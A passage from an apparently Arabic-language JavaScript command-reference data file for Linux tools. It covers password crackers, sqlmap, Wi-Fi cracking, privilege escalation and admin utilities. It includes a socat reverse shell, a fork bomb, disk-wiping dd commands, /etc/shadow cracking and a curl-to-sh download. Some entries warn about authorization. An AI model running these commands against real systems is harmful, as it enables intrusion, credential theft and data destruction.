   'hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1',
   'hydra -L users.txt -P pass.txt ftp://10.10.10.5',
   'hydra -l admin -P wordlist.txt http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"',
 ],
 note:'⚠️ استخدم Hydra فقط على أنظمة تملك إذناً بفحصها. يُعد جريمة على أنظمة الآخرين!'
},
{id:'hashcat',name:'hashcat',icon:'🔨',level:5,category:'كلمات المرور',
 desc:'أسرع أداة لكسر الهاشات باستخدام GPU',
 syntax:'hashcat [OPTIONS] HASHFILE [WORDLIST]',
 flags:[
   {flag:'-m TYPE',desc:'نوع الهاش (0=MD5, 1000=NTLM, 1800=SHA512crypt...)'},
   {flag:'-a MODE',desc:'نوع الهجوم (0=قاموس, 3=Brute-Force, 6=Hybrid)'},
   {flag:'-w N',desc:'مستوى العمل (1-4، 3=افتراضي)'},
   {flag:'--show',desc:'اعرض الهاشات المكسورة'},
   {flag:'-o FILE',desc:'احفظ الناتج'},
   {flag:'-r RULE',desc:'استخدم قواعد تحويل'},
   {flag:'--force',desc:'تجاهل تحذيرات البيئة'},
 ],
 examples:[
   'hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt',
   'hashcat -m 1000 hash.txt wordlist.txt',
   'hashcat -m 1800 shadow_hash rockyou.txt --show',
 ],
 note:'الهاشات الشائعة: 0=MD5, 100=SHA1, 1000=NTLM, 1800=sha512crypt (Linux)'
},
{id:'john',name:'john (John the Ripper)',icon:'⚔️',level:5,category:'كلمات المرور',
 desc:'كسر كلمات مرور الهاشات — الأداة الكلاسيكية',
 syntax:'john [OPTIONS] HASHFILE',
 flags:[
   {flag:'--wordlist=FILE',desc:'استخدم قائمة كلمات'},
   {flag:'--format=TYPE',desc:'حدد نوع الهاش'},
   {flag:'--show',desc:'اعرض كلمات المرور المكشوفة'},
   {flag:'--rules',desc:'طبّق قواعد التحويل'},
   {flag:'--incremental',desc:'هجوم شامل (brute-force)'},
   {flag:'--list=formats',desc:'اعرض الصيغ المدعومة'},
 ],
 examples:[
   'john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt',
   'unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt',
   'john --show hashes.txt',
 ],
},
{id:'sqlmap',name:'sqlmap',icon:'💉',level:5,category:'تطبيقات الويب',
 desc:'اكتشاف واستغلال ثغرات SQL Injection تلقائياً',
 syntax:'sqlmap [OPTIONS] -u URL',
 flags:[
   {flag:'-u URL',desc:'عنوان URL الهدف'},
   {flag:'--data=DATA',desc:'بيانات POST'},
   {flag:'--dbs',desc:'استخرج أسماء قواعد البيانات'},
   {flag:'-D DB --tables',desc:'جداول قاعدة بيانات محددة'},
   {flag:'-D DB -T TABLE --dump',desc:'استخرج بيانات جدول'},
   {flag:'--batch',desc:'لا تسأل (إجابة تلقائية)'},
   {flag:'--level=N',desc:'مستوى العمق (1-5)'},
   {flag:'--risk=N',desc:'مستوى الخطر (1-3)'},
   {flag:'--os-shell',desc:'احصل على shell في نظام التشغيل'},
   {flag:'--cookie=COOKIE',desc:'استخدم Cookies'},
   {flag:'--random-agent',desc:'User-Agent عشوائي'},
   {flag:'--proxy=PROXY',desc:'استخدم Proxy'},
   {flag:'--tor',desc:'استخدم شبكة Tor'},
 ],
 examples:[
   'sqlmap -u "http://target.com/page?id=1" --dbs',
   'sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --dbs',
   'sqlmap -u "http://target.com/?id=1" -D mydb -T users --dump',
 ],
 note:'⚠️ استخدم sqlmap فقط على مواقع تملك إذناً باختبارها!'
},
{id:'gobuster',name:'gobuster',icon:'🔍',level:5,category:'تطبيقات الويب',
 desc:'اكتشاف المسارات والمجلدات والملفات الخفية في مواقع الويب',
 syntax:'gobuster [MODE] [OPTIONS]',
 flags:[
   {flag:'dir',desc:'وضع اكتشاف المجلدات'},
   {flag:'dns',desc:'وضع اكتشاف DNS'},
   {flag:'vhost',desc:'وضع اكتشاف Virtual Hosts'},
   {flag:'-u URL',desc:'الهدف'},
   {flag:'-w WORDLIST',desc:'قائمة الكلمات'},
   {flag:'-t N',desc:'عدد الخيوط المتوازية'},
   {flag:'-x EXTENSIONS',desc:'امتدادات للبحث (php,txt,html)'},
   {flag:'-b CODES',desc:'استثنِ كودات HTTP (404,403)'},
   {flag:'-s CODES',desc:'كودات النجاح (200,301)'},
   {flag:'-c COOKIE',desc:'استخدم Cookies'},
   {flag:'-H HEADER',desc:'أضف ترويسة مخصصة'},
   {flag:'-o FILE',desc:'احفظ الناتج'},
   {flag:'-q',desc:'صامت بدون لافتة'},
 ],
 examples:[
   'gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt',
   'gobuster dir -u http://target.com -w wordlist.txt -x php,txt,html',
   'gobuster dns -d target.com -w subdomains.txt',
 ],
},
{id:'nikto',name:'nikto',icon:'🕵️',level:5,category:'تطبيقات الويب',
 desc:'فحص خوادم الويب عن الثغرات والإعدادات الخاطئة',
 syntax:'nikto [OPTIONS]',
 flags:[
   {flag:'-h HOST',desc:'الهدف (IP أو Domain)'},
   {flag:'-p PORT',desc:'المنفذ'},
   {flag:'-ssl',desc:'فرض استخدام SSL'},
   {flag:'-o FILE',desc:'احفظ التقرير'},
   {flag:'-Format FORMAT',desc:'صيغة التقرير (csv, htm, txt, xml)'},
   {flag:'-Tuning N',desc:'نوع الفحص (1-9)'},
   {flag:'-evasion N',desc:'أسلوب التهرب من IDS'},
   {flag:'-C all',desc:'فحص كل الـ cookies'},
 ],
 examples:[
   'nikto -h http://target.com',
   'nikto -h target.com -p 443 -ssl',
   'nikto -h target.com -o report.html -Format htm',
 ],
},
{id:'wfuzz',name:'wfuzz',icon:'🔀',level:5,category:'تطبيقات الويب',
 desc:'أداة Fuzzing قوية لاختبار تطبيقات الويب',
 syntax:'wfuzz [OPTIONS] -w WORDLIST URL',
 flags:[
   {flag:'-w FILE',desc:'قائمة الكلمات'},
   {flag:'FUZZ',desc:'مكان الـ Fuzzing في URL أو الجسم'},
   {flag:'-c',desc:'إخراج ملوّن'},
   {flag:'--hc CODE',desc:'أخفِ كودات HTTP محددة'},
   {flag:'--hl N',desc:'أخفِ ردوداً بعدد سطور محدد'},
   {flag:'-t N',desc:'خيوط متوازية'},
   {flag:'-p PROXY',desc:'استخدم Proxy'},
   {flag:'-b COOKIE',desc:'استخدم Cookie'},
 ],
 examples:[
   'wfuzz -c -w /usr/share/wordlists/wfuzz/general/common.txt http://target.com/FUZZ',
   'wfuzz -c --hc 404 -w wordlist.txt http://target.com/FUZZ.php',
   'wfuzz -c -z range,1-100 http://target.com/user?id=FUZZ',
 ],
},
{id:'wireshark_cli',name:'tshark',icon:'🦈',level:5,category:'التحليل الجنائي',
 desc:'Wireshark في سطر الأوامر — تحليل حزم الشبكة',
 syntax:'tshark [OPTIONS]',
 flags:[
   {flag:'-i INTERFACE',desc:'واجهة الالتقاط'},
   {flag:'-r FILE',desc:'اقرأ من ملف .pcap'},
   {flag:'-w FILE',desc:'اكتب إلى ملف .pcap'},
   {flag:'-Y FILTER',desc:'فلتر العرض (مثل http, tcp)'},
   {flag:'-T fields',desc:'اعرض حقولاً محددة'},
   {flag:'-e FIELD',desc:'حقل معين للعرض'},
   {flag:'-c N',desc:'التقط N حزمة'},
   {flag:'-V',desc:'تفاصيل كاملة'},
 ],
 examples:[
   'tshark -i eth0',
   'tshark -r capture.pcap -Y http',
   'tshark -r capture.pcap -T fields -e http.request.uri',
   'tshark -i eth0 -Y "tcp.port==80" -w http.pcap',
 ],
},
{id:'volatility',name:'volatility',icon:'🧠',level:5,category:'التحليل الجنائي',
 desc:'تحليل ذاكرة RAM للأنظمة المخترقة (Memory Forensics)',
 syntax:'volatility -f MEMORY_DUMP [OPTIONS] PLUGIN',
 flags:[
   {flag:'-f FILE',desc:'ملف الـ Memory Dump'},
   {flag:'--profile=PROFILE',desc:'ملف الـ OS profile'},
   {flag:'imageinfo',desc:'اكتشف الـ profile المناسب'},
   {flag:'pslist',desc:'قائمة العمليات'},
   {flag:'pstree',desc:'شجرة العمليات'},
   {flag:'netscan',desc:'الاتصالات الشبكية'},
   {flag:'cmdline',desc:'أوامر سطر الأوامر لكل عملية'},
   {flag:'filescan',desc:'ابحث عن الملفات في الذاكرة'},
   {flag:'hashdump',desc:'استخرج هاشات كلمات المرور'},
   {flag:'malfind',desc:'ابحث عن الكود المحقون (Malware)'},
   {flag:'dumpfiles',desc:'استخرج ملفاً من الذاكرة'},
 ],
 examples:[
   'volatility -f memory.raw imageinfo',
   'volatility -f memory.raw --profile=Win7SP1x64 pslist',
   'volatility -f memory.raw --profile=Win7SP1x64 netscan',
   'volatility -f memory.raw --profile=Win7SP1x64 hashdump',
 ],
},
{id:'binwalk',name:'binwalk',icon:'📦',level:5,category:'التحليل الجنائي',
 desc:'تحليل الملفات الثنائية واستخراج ما بداخلها (Firmware Analysis)',
 syntax:'binwalk [OPTIONS] FILE',
 flags:[
   {flag:'-e',desc:'استخرج الملفات المضمنة'},
   {flag:'-M',desc:'استخراج تكراري للملفات المتداخلة'},
   {flag:'-B',desc:'فحص Entropy لاكتشاف التشفير'},
   {flag:'-A',desc:'ابحث عن كود قابل للتنفيذ'},
   {flag:'-C DIR',desc:'مجلد الاستخراج'},
 ],
 examples:[
   'binwalk firmware.bin',
   'binwalk -e firmware.bin',
   'binwalk -eM firmware.bin',
 ],
},
{id:'strings',name:'strings',icon:'📝',level:5,category:'التحليل الجنائي',
 desc:'استخرج النصوص القابلة للقراءة من ملفات ثنائية',
 syntax:'strings [OPTIONS] FILE',
 flags:[
   {flag:'-n N',desc:'الحد الأدنى لطول النص (افتراضي 4)'},
   {flag:'-a',desc:'ابحث في كل الملف'},
   {flag:'-o',desc:'اعرض الإزاحة (offset)'},
   {flag:'-e ENCODING',desc:'نوع الترميز (s=ASCII, l=UTF-16LE...)'},
 ],
 examples:[
   'strings malware.exe',
   'strings -n 8 binary.bin | grep -i "pass\\|user\\|url"',
   'strings -e l malware.exe',
 ],
},
{id:'exiftool',name:'exiftool',icon:'📸',level:5,category:'التحليل الجنائي',
 desc:'قراءة وكتابة وتعديل Metadata للصور والملفات',
 syntax:'exiftool [OPTIONS] FILE',
 flags:[
   {flag:'-all=',desc:'احذف كل الـ Metadata (مهم للخصوصية!)'},
   {flag:'-TAG=VALUE',desc:'عدّل حقل محدد'},
   {flag:'-json',desc:'إخراج JSON'},
   {flag:'-r',desc:'تكراري'},
   {flag:'-gps:all',desc:'معلومات GPS فقط'},
 ],
 examples:[
   'exiftool photo.jpg',
   'exiftool -gps:all photo.jpg',
   'exiftool -all= photo.jpg',
   'exiftool -json *.jpg',
 ],
 note:'الصور تحتوي أحياناً على GPS الدقيق لموقعك! exiftool -all= يحذفه.'
},
{id:'aircrack',name:'aircrack-ng',icon:'📡',level:5,category:'الشبكات اللاسلكية',
 desc:'تحليل واختبار أمان شبكات Wi-Fi',
 syntax:'aircrack-ng [OPTIONS] FILE',
 flags:[
   {flag:'airmon-ng start IFACE',desc:'تفعيل وضع Monitor Mode'},
   {flag:'airodump-ng IFACE',desc:'التقاط حزم Wi-Fi'},
   {flag:'-w WORDLIST',desc:'قائمة كلمات للكسر'},
   {flag:'-b BSSID',desc:'حدد AP محدد بـ MAC'},
   {flag:'-e SSID',desc:'حدد AP بالاسم'},
   {flag:'aireplay-ng --deauth N',desc:'إرسال حزم Deauth لالتقاط Handshake'},
 ],
 examples:[
   'airmon-ng start wlan0',
   'airodump-ng wlan0mon',
   'airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon',
   'aircrack-ng -w rockyou.txt capture-01.cap',
 ],
 note:'⚠️ اختبار أمان Wi-Fi يتطلب إذناً صريحاً من مالك الشبكة!'
},
{id:'linpeas',name:'linpeas.sh',icon:'🦅',level:5,category:'رفع الصلاحيات',
 desc:'سكريبت تلقائي للبحث عن طرق رفع الصلاحيات في Linux',
 syntax:'./linpeas.sh [OPTIONS]',
 flags:[
   {flag:'-a',desc:'كل الفحوصات'},
   {flag:'-s',desc:'سريع جداً'},
   {flag:'-q',desc:'صامت'},
 ],
 examples:[
   'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh',
   './linpeas.sh -a 2>&1 | tee linpeas.txt',
 ],
 note:'ابحث عن: SUID files, sudo -l, writable paths, kernel exploits, cron jobs.'
},
{id:'privesc_suid',name:'find SUID',icon:'🔼',level:5,category:'رفع الصلاحيات',
 desc:'البحث عن ملفات SUID لاستغلالها في رفع الصلاحيات',
 syntax:'find / -perm /4000 -type f 2>/dev/null',
 flags:[
   {flag:'/4000',desc:'ملفات SUID'},
   {flag:'/2000',desc:'ملفات SGID'},
   {flag:'/6000',desc:'SUID + SGID'},
   {flag:'-ls',desc:'اعرض تفاصيل كل ملف'},
 ],
 examples:[
   'find / -perm /4000 -type f 2>/dev/null',
   'find / -perm -4000 -user root -type f 2>/dev/null',
   'find / -perm /2000 -type f 2>/dev/null',
 ],
 note:'ملفات SUID تشغّل بصلاحيات المالك (عادةً root) — يمكن استغلالها للـ PrivEsc.'
},
{id:'ghidra_cmd',name:'radare2 (r2)',icon:'🔍',level:5,category:'الهندسة العكسية',
 desc:'أداة تحليل وهندسة عكسية للثنائيات والبرمجيات الخبيثة',
 syntax:'r2 [OPTIONS] FILE',
 flags:[
   {flag:'-d',desc:'تحليل ديناميكي (Debugging)'},
   {flag:'-A',desc:'تحليل تلقائي شامل'},
   {flag:'aa',desc:'داخل r2: تحليل شامل'},
   {flag:'afl',desc:'داخل r2: قائمة الدوال'},
   {flag:'pdf @FUNCTION',desc:'داخل r2: تفكيك دالة'},
   {flag:'iz',desc:'داخل r2: النصوص في البرنامج'},
   {flag:'is',desc:'داخل r2: الرموز'},
   {flag:'?',desc:'داخل r2: مساعدة'},
 ],
 examples:[
   'r2 -A binary',
   'r2 binary # ثم: aa; afl; pdf @main',
 ],
},
{id:'gdb_cmd',name:'gdb',icon:'🐛',level:5,category:'الهندسة العكسية',
 desc:'GNU Debugger — تشخيص وتحليل الثنائيات',
 syntax:'gdb [OPTIONS] PROGRAM',
 flags:[
   {flag:'run / r',desc:'شغّل البرنامج'},
   {flag:'break FUNC',desc:'ضع Breakpoint'},
   {flag:'next / n',desc:'خطوة واحدة (بدون دخول الدوال)'},
   {flag:'step / s',desc:'خطوة مع الدخول للدوال'},
   {flag:'continue / c',desc:'استمر حتى الـ Breakpoint التالي'},
   {flag:'info registers',desc:'اعرض قيم الـ Registers'},
   {flag:'x/Ns ADDR',desc:'اعرض N كلمة من الذاكرة'},
   {flag:'disassemble FUNC',desc:'تفكيك دالة'},
   {flag:'print VAR',desc:'اعرض قيمة متغير'},
   {flag:'quit / q',desc:'اخرج'},
 ],
 examples:[
   'gdb ./vulnerable_binary',
   'gdb --args ./program arg1 arg2',
   '(gdb) break main',
   '(gdb) run',
   {flag:'quit / q',desc:'اخرج'},
 ],
},

// --- Rare, High-level, and Dangerous Commands ---
{id:'chattr',name:'chattr',icon:'🔒',level:3,category:'الصلاحيات المتقدمة',
 desc:'تغيير خصائص الملفات الفريدة (مثل جعل الملف غير قابل للحذف حتى من قبل root)',
 syntax:'chattr [OPTIONS] [OPERATOR][ATTRIBUTE] FILE',
 flags:[
   {flag:'+i',desc:'Immutable: يجعل الملف غير قابل للتعديل، الحذف، التسمية، أو الكتابة عليه (حتى لـ root)'},
   {flag:'-i',desc:'إزالة خاصية عدم التعديل (Immutable)'},
   {flag:'+a',desc:'Append Only: يسمح فقط بإضافة بيانات لنهاية الملف (مثل سجلات الـ logs) ويمنع الحذف أو التعديل'},
   {flag:'-R',desc:'تطبيق الخصائص بشكل تكراري على المجلدات'},
   {flag:'+s',desc:'Secure Deletion: عند حذف الملف، يتم كتابة أصفار فوق مكانه في القرص لضمان عدم استرجاعه'},
 ],
 examples:[
   'sudo chattr +i /etc/shadow # منع تعديل أو حذف ملف كلمة المرور نهائياً',
   'sudo chattr -i /etc/shadow # فك الحماية لتعديل الملف',
   'sudo chattr +a /var/log/custom.log # جعل الملف للإضافة فقط لمنع تلاعب المخترقين بالسجلات',
 ],
 note:'خيار +i هو سلاح قوي لحماية ملفات النظام الحساسة من التعديل العشوائي أو الخبيث.'
},
{id:'setfacl',name:'setfacl',icon:'🔑',level:3,category:'الصلاحيات المتقدمة',
 desc:'التحكم الدقيق في صلاحيات المستخدمين (Access Control Lists - ACLs) خارج نظام ugo التقليدي',
 syntax:'setfacl [OPTIONS] FILE',
 flags:[
   {flag:'-m u:USERNAME:MODE',desc:'تعديل أو إضافة صلاحيات مستخدم محدد (مثال: u:alice:rx)'},
   {flag:'-m g:GROUPNAME:MODE',desc:'تعديل أو إضافة صلاحيات مجموعة محددة'},
   {flag:'-x u:USERNAME',desc:'إزالة صلاحيات مستخدم محدد بالكامل من الـ ACL'},
   {flag:'-b',desc:'حذف كل قواعد الـ ACL وإعادة الملف للنظام التقليدي'},
   {flag:'-R',desc:'تطبيق القواعد تكرارياً على المجلدات'},
   {flag:'-d',desc:'تعيين صلاحيات افتراضية (Default) تُورث تلقائياً لأي ملف جديد ينشأ داخل المجلد'},
 ],
 examples:[
   'setfacl -m u:alice:rw secret.txt # منح alice صلاحية قراءة وكتابة دون تغيير مالك الملف',
   'setfacl -m g:marketing:r report.pdf',
   'getfacl secret.txt # لعرض الصلاحيات الدقيقة المخصصة للملف',
   'setfacl -b secret.txt # تنظيف وإزالة كل صلاحيات الـ ACL المخصصة',
 ],
 note:'مفيد جداً في بيئات العمل المشتركة لمنح صلاحيات فردية ومخصصة دون إدخال المستخدمين في مجموعات مشتركة.'
},
{id:'shred',name:'shred',icon:'☣️',level:3,category:'إتلاف البيانات',
 desc:'تدمير الملفات بشكل آمن عن طريق الكتابة فوقها ببيانات عشوائية لمنع استرجاعها جنائياً',
 syntax:'shred [OPTIONS] FILE...',
 flags:[
   {flag:'-u',desc:'احذف الملف بعد الانتهاء من الكتابة فوقه (Deallocate and remove)'},
   {flag:'-z',desc:'اكتب أصفاراً في النهاية لإخفاء عملية التمزيق (Hide shredding)'},
   {flag:'-n N',desc:'اكتب فوق البيانات N من المرات (الافتراضي 3 مرات)'},
   {flag:'-v',desc:'اعرض تقدم العملية بالتفصيل'},
   {flag:'-s SIZE',desc:'مزق عدداً محدداً من البايتات فقط'},
 ],
 examples:[
   'shred -u -z -n 5 secret_key.txt # تمزيق آمن بـ 5 دورات وكتابة أصفار في النهاية ثم حذف الملف',
   'shred -v /dev/sdb1 # مسح وتدمير كامل البيانات على القسم sdb1 بشكل فيزيائي',
 ],
 note:'⚠️ تحذير: هذا الأمر مدمر نهائياً للبيانات، ولا يمكن التراجع عنه أو استعادة الملفات بعده بأي شكل.'
},
{id:'sysctl',name:'sysctl',icon:'⚙️',level:4,category:'النواة والـ Kernel',
 desc:'تهيئة وتعديل إعدادات نواة لينكس (Kernel parameters) أثناء تشغيل النظام',
 syntax:'sysctl [OPTIONS] [VARIABLE[=VALUE]]',
 flags:[
   {flag:'-a',desc:'عرض جميع قيم ومتغيرات النواة الحالية'},
   {flag:'-w VAR=VALUE',desc:'كتابة وتعديل قيمة متغير معين بشكل مؤقت (ينتهي بعد الإعادة)'},
   {flag:'-p [FILE]',desc:'تحميل وتطبيق القيم من ملف الضبط (الافتراضي /etc/sysctl.conf)'},
   {flag:'-n',desc:'طباعة قيمة المتغير فقط دون اسمه'},
 ],
 examples:[
   'sysctl -a | grep ip_forward',
   'sudo sysctl -w net.ipv4.ip_forward=1 # تفعيل ميزة توجيه الحزم (Routing) فورياً',
   'sudo sysctl -w kernel.randomize_va_space=2 # تفعيل ميزة ASLR بالكامل للحماية من ثغرات Buffer Overflow',
   'sudo sysctl -p # تطبيق التغييرات الدائمة المكتوبة في /etc/sysctl.conf',
 ],
},
{id:'chroot',name:'chroot',icon:'🚪',level:4,category:'إدارة النظام',
 desc:'تغيير دليل الجذر (Root Directory) للعملية الحالية والعمليات الفرعية (إنشاء سجن Chroot)',
 syntax:'chroot NEWROOT [COMMAND [ARG...]]',
 flags:[
   {flag:'--userspec=USER:GROUP',desc:'تحديد المستخدم والمجموعة داخل بيئة Chroot الجديدة'},
   {flag:'--groups=G_LIST',desc:'تحديد المجموعات الإضافية داخل البيئة'},
 ],
 examples:[
   'sudo chroot /mnt/sysimage # الدخول لبيئة نظام معطل مثبت في /mnt لإصلاح الإقلاع أو الـ Grub',
   'sudo chroot /var/chroot/apache /bin/bash # حصر وتشغيل خادم الويب في سجن منفصل لحماية خادم النظام',
 ],
 note:'أداة أساسية في عمليات الإنقاذ (System Recovery) وحبس الخدمات الحساسة لتقليل أثر الاختراقات.'
},
{id:'dd',name:'dd',icon:'⚡',level:3,category:'إدارة الأقراص',
 desc:'نسخ وتحويل البيانات الخام على مستوى البايت (يطلق عليه مجازاً Data Destroyer لخطورته)',
 syntax:'dd if=INPUT_FILE of=OUTPUT_FILE [OPTIONS]',
 flags:[
   {flag:'if=FILE',desc:'ملف المدخلات / المصدر (Input File)'},
   {flag:'of=FILE',desc:'ملف المخرجات / الوجهة (Output File)'},
   {flag:'bs=BYTES',desc:'حجم كتلة البيانات المنسوخة في المرة الواحدة (مثل bs=4M)'},
   {flag:'count=N',desc:'نسخ N كتلة فقط ثم التوقف'},
   {flag:'status=progress',desc:'عرض شريط التقدم الفعلي للنسخ'},
   {flag:'conv=noerror,sync',desc:'استمر في النسخ حتى لو واجهت قطاعات تالفة مع مزامنة الكتل'},
 ],
 examples:[
   'dd if=ubuntu.iso of=/dev/sdX bs=4M status=progress # حرق نظام لينكس على الفلاشة',
   'dd if=/dev/sda of=/backup/mbr.bak bs=512 count=1 # نسخ سجل الإقلاع الرئيسي MBR',
   'dd if=/dev/zero of=/dev/sdb bs=1M status=progress # تصفير القرص sdb بالكامل (مسح شامل وسريع)',
   'dd if=/dev/urandom of=/dev/sda bs=4M status=progress # الكتابة العشوائية فوق القرص لتدمير البيانات بالكامل',
 ],
 note:'⚠️ خطير جداً! خطأ بسيط في تسمية القرص (مثل sda بدلاً من sdb) قد يمسح نظام تشغيلك بالكامل دون أي تحذير.'
},
{id:'forkbomb',name:'Fork Bomb',icon:'💣',level:4,category:'أمن الأنظمة',
 desc:'هجوم استنزاف الموارد التكراري (Denial of Service) الشهير في سطر أوامر Bash',
 syntax:':(){ :|:& };:',
 flags:[
   {flag:':()',desc:'تعريف دالة باسم ":"'},
   {flag:'{ :|:& };',desc:'محتوى الدالة: استدعاء الدالة لنفسها وتمرير الإخراج لدورة جديدة في الخلفية &'},
   {flag:':',desc:'استدعاء وتشغيل الدالة المعرفة للبدء بالانفجار'},
 ],
 examples:[
   ':(){ :|:& };:',
 ],
 note:'⚠️ تحذير: تشغيل هذا الأمر سيؤدي لإنشاء عمليات لانهائية حتى تمتلئ ذاكرة النظام والـ CPU بالكامل ويقفز النظام ويتوقف عن الاستجابة تماماً. الطريقة الوحيدة للحل هي إعادة التشغيل الفيزيائي ما لم يكن هناك سقف محدد للعمليات في /etc/security/limits.conf.'
},
{id:'socat',name:'socat',icon:'🔗',level:5,category:'الاتصالات المتقدمة',
 desc:'أداة ربط وتوجيه تدفقات البيانات (Sockets) ثنائية الاتجاه (أقوى وأعقد من netcat)',
 syntax:'socat [OPTIONS] ADDRESS-1 ADDRESS-2',
 flags:[
   {flag:'TCP-LISTEN:PORT',desc:'فتح منفذ للاستماع عبر TCP'},
   {flag:'EXEC:CMD',desc:'تنفيذ أمر وتوجيه مدخلاته ومخرجاته للمقبس (مثل EXEC:/bin/bash)'},
   {flag:'OPENSSL-LISTEN:PORT',desc:'فتح منفذ مشفر باستخدام شهادات SSL/TLS'},
   {flag:'SOCKS4a:PROXY_IP:HOST:PORT',desc:'توجيه البيانات عبر بروكسي SOCKS'},
   {flag:'-,stderr',desc:'استخدام الإدخال القياسي والإخراج القياسي (STDIO)'},
 ],
 examples:[
   'socat TCP-LISTEN:4444,reuseaddr FILE:`tty`,raw,echo=0 # إنشاء مستمع متقدم ومستقر جداً',
   'socat TCP:192.168.1.10:4444 EXEC:/bin/bash # إنشاء Reverse Shell مشفر ومستقر',
   'socat TCP-LISTEN:80,fork TCP:10.0.0.5:80 # إعادة توجيه المنافذ (Port Forwarding) بكفاءة عالية لكل الاتصالات الواردة',
 ],
},
{id:'ltrace',name:'ltrace',icon:'🔬',level:4,category:'التشخيص المتقدم',
 desc:'تتبع استدعاءات المكتبات المشتركة الديناميكية (Library Calls) التي يطلبها البرنامج',
 syntax:'ltrace [OPTIONS] COMMAND',
 flags:[
   {flag:'-p PID',desc:'الاتصال بعملية تعمل حالياً وتتبعها'},
   {flag:'-e FILTER',desc:'تتبع دوال محددة فقط (مثل strcmp, malloc)'},
   {flag:'-c',desc:'حساب وإحصاء عدد الاستدعاءات ووقتها بنهاية البرنامج'},
   {flag:'-S',desc:'عرض استدعاءات النظام (Syscalls) أيضاً بجانب استدعاءات المكتبة'},
 ],
 examples:[
   'ltrace ./vulnerable_program # مفيد لمعرفة الدوال الأمنية الضعيفة التي يستدعيها التطبيق',
   'ltrace -e strcmp ./auth_program # تتبع دالة المقارنة strcmp لكشف كلمات المرور المقارنة في الذاكرة',
 ],
},
{id:'dmidecode',name:'dmidecode',icon:'🖥️',level:3,category:'إدارة النظام',
 desc:'فك تشفير وعرض معلومات اللوحة الأم والعتاد فيزيائياً من الـ BIOS/SMBIOS مباشرة',
 syntax:'dmidecode [OPTIONS]',
 flags:[
   {flag:'-t TYPE',desc:'عرض نوع محدد من العتاد (1=System, 2=Motherboard, 4=CPU, 17=Memory)'},
   {flag:'-s KEYWORD',desc:'عرض قيمة محددة مباشرة (مثل system-serial-number)'},
 ],
 examples:[
   'sudo dmidecode -t memory # تفاصيل الرامات الحالية، سرعتها، ونوعها والفتحات الشاغرة',
   'sudo dmidecode -t bios # عرض نسخة وتاريخ تحديث البيوس الخاص بالجهاز',
   'sudo dmidecode -s system-uuid # جلب الرقم الفريد لجهاز السيرفر',
 ],
},
{id:'sysrq',name:'Magic SysRq',icon:'🚨',level:4,category:'أمن الأنظمة',
 desc:'إصدار أوامر منخفضة المستوى مباشرة لنواة النظام (Kernel) في حالات الطوارئ والانهيار',
 syntax:'echo CHARACTER > /proc/sysrq-trigger',
 flags:[
   {flag:'b',desc:'إعادة تشغيل فورية وإجبارية للنظام دون مزامنة الأقراص (Reboot)'},
   {flag:'o',desc:'إيقاف تشغيل فوري للنظام (Shut down)'},
   {flag:'s',desc:'مزامنة كافة البيانات المعلقة بالذاكرة وكتابتها على القرص (Sync)'},
   {flag:'u',desc:'إعادة توصيل كل أنظمة الملفات كـ "قراءة فقط" لحمايتها (Unmount)'},
   {flag:'e',desc:'إرسال إشارة SIGTERM لكافة العمليات ما عدا init'},
   {flag:'i',desc:'إرسال إشارة SIGKILL لكافة العمليات (لإيقاف أي عملية متجمدة فوراً)'},
   {flag:'REISUB',desc:'الترتيب السحري والآمن لإنقاذ سيرفر منهار (Sync -> Unmount -> Reboot)'},
 ],
 examples:[
   'echo s > /proc/sysrq-trigger # أول خطوة لضمان عدم فقدان البيانات',
   'echo u > /proc/sysrq-trigger # ثاني خطوة لحماية القرص من الفساد',
   'echo b > /proc/sysrq-trigger # إعادة تشغيل السيرفر المتجمد فوراً',
 ],
 note:'يُعد REISUB أفضل صديق لمدير النظام عند تجمد السيرفر بالكامل وتوقفه عن الاستجابة لـ SSH.'
},
{id:'knock',name:'knock',icon:'🚪',level:5,category:'الاستطلاع والتخفي',
 desc:'عميل طرق المنافذ (Port Knocking) لفتح منافذ جدار الحماية المغلقة بطريقة سرية',
 syntax:'knock [OPTIONS] TARGET PORT1:PROTO PORT2:PROTO...',
 flags:[
   {flag:'-d N',desc:'الفاصل الزمني بالملي ثانية بين الطرقات (Delay)'},
   {flag:'-u',desc:'استخدام بروتوكول UDP بدل TCP'},
 ],
 examples:[
   'knock 192.168.1.10 7000:tcp 8000:tcp 9000:tcp # إرسال سلسلة طرقات سرية لفتح منفذ الـ SSH المغلق بجدار الحماية',
   'knock -u 10.10.10.10 5000:udp 6000:udp',
 ],
 note:'يعمل عن طريق إرسال حزم لمنافذ مغلقة بترتيب وتوقيت سري ومحدد، ويراقب خادم knockd السجلات لفتح المنفذ عند اكتمال التوقيع.'
},
{id:'capsh',name:'capsh',icon:'🛡️',level:4,category:'الصلاحيات المتقدمة',
 desc:'إدارة وفحص قدرات وصلاحيات العمليات (Linux Capabilities) لتجنب منح صلاحية root كاملة',
 syntax:'capsh [OPTIONS]',
 flags:[
   {flag:'--print',desc:'طباعة قدرات الجلسة الحالية وحالتها بالتفصيل'},
   {flag:'--drop=cap_name',desc:'بدء الجلسة مع إزالة قدرة محددة لزيادة الأمان'},
   {flag:'getcap FILE',desc:'عرض القدرات الخاصة بملف تنفيذي معين'},
   {flag:'setcap CAP_NAME+ep FILE',desc:'منح قدرة محددة لملف تنفيذي (لتجنب تشغيله بـ sudo)'},
 ],
 examples:[
   'capsh --print',
   'sudo setcap cap_net_bind_service=+ep /usr/bin/node # السماح لتطبيق Node.js بالعمل على منفذ 80 دون الحاجة لـ root',
   'getcap /usr/bin/ping # التحقق من القدرات الممنوحة لأداة ping لإرسال حزم خام',
 ],
 note:'Linux Capabilities تقسم صلاحيات root لـ 40+ قدرة منفصلة، وهي مهمة جداً في فحص ثغرات الارتقاء بالصلاحيات.'
},
{id:'cryptsetup',name:'cryptsetup',icon:'🔒',level:4,category:'إدارة التخزين',
 desc:'تشفير الأقراص والأقسام على مستوى الهاردوير باستخدام نظام LUKS (Linux Unified Key Setup)',
 syntax:'cryptsetup [OPTIONS] COMMAND DEVICE [MAPNAME]',
 flags:[
